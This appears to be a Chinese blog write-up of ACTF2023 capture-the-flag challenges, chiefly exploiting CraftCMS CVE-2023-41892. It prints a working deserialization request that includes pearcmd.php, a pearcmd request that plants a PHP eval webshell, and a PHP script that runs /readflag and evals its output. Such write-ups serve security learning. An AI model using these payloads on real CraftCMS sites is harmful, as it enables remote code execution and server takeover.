ACTF2023 WP

Delete included in category CTF

2023-10-31 2023-10-31 207 words One minute

东方原神大学-MISC

fofa 秒了

MyGO’s Live!!!!!-WEB

请求：http://124.70.33.170:24000/checker?url=124.70.33.170:80

直接自己namp

Craftcms–WEB

craftcms

CVE-2023-41892

网上有POC（无果）

https://gist.github.com/gmh5225/8fad5f02c2cf0334249614eb80cbf4ce

看了一下poc，出现的地方应该是\craft\controllers\ConditionsController

猜一手是反序列化+RCE

https://blog.calif.io/p/craftcms-rce

构造了一下poc

但是好像只能执行phpinfo

发现了账号密码，登录

备份了下数据库，没看见有什么东西

思路二：https://www.anquanke.com/post/id/201136 https://www.cnblogs.com/Xy–1/p/12769094.html https://github.com/vulhub/vulhub/tree/master/php/inclusion

思路三：percmd https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html

思路三可以，

pearcmd写入文件

先用cve包含pearcmd.php然后写入shell

包含

1

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/usr/local/lib/php/pearcmd.php"}]}}

写入

1

/?+config-create+/<?=@eval($_POST['1']);die();?>+/tmp/delete

包含了但是执行/readflag没有回显

蚁剑连一下然后加一个文件

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43


<?php 
error_reporting(E_ALL);
echo "1";
$descriptorspec = array(
   0 => array("pipe", "r"),  // 标准输入，子进程从此管道中读取数据
   1 => array("pipe", "w"),  // 标准输出，子进程向此管道中写入数据
   2 => array("pipe", "r") // 标准错误，写入到一个文件
);

$file=array();

$process = proc_open("/readflag 2>&1", $descriptorspec, $file);

var_dump($process);
var_dump($file);

function readln($file){
    $out = "";
    $a = fread($file, 1);
    echo "readln";
    while ($a != "\n") {
        $out = $out.$a;
        $a = fread($file, 1);
    }
    return $out;
}

$data=readln($file[1]);
var_dump($data);

$data=readln($file[1]);
var_dump($data);
$ans = "".eval("return ".$data.";")."\n";
echo "ans";
var_dump($ans);
fputs($file[0], $ans);
$data=readln($file[1]);
echo $data;
$data=readln($file[1]);
echo $data;
$data=readln($file[1]);
echo $data;
?>